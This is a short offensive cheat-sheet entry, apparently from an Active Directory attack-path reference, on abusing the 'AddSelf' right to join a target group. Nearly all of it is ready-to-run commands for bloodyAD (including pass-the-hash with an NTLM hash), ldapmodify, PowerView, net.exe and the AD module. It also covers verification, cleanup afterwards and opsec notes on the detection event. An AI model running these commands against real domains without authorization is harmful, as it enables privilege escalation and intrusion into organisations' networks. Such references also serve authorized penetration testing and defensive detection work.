AddSelf
Source can add itself to the target group (Self-Membership extended right)
Applies to: User β Group
Linux Abuse
bloodyAD β add self to group
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
bloodyAD β add self with hash
bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
ldapmodify (self-membership)
ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: member
member: CN=<username>,CN=Users,DC=<domain>,DC=<tld>
EOF
Windows Abuse
PowerView
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
CMD / net.exe
net group "<target-group>" <username> /add /domain
AD Module
Add-ADGroupMember -Identity '<target-group>' -Members '<username>'
Verify
Get-DomainGroupMember -Identity '<target-group>' | Where-Object {$_.MemberName -eq '<username>'}
Cleanup (remove self after done)
Remove-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Opsec
- Self-membership writes generate event 4728 on DC
- Functionally identical to AddMember but source can only add itself β less powerful than AddMember but same detection footprint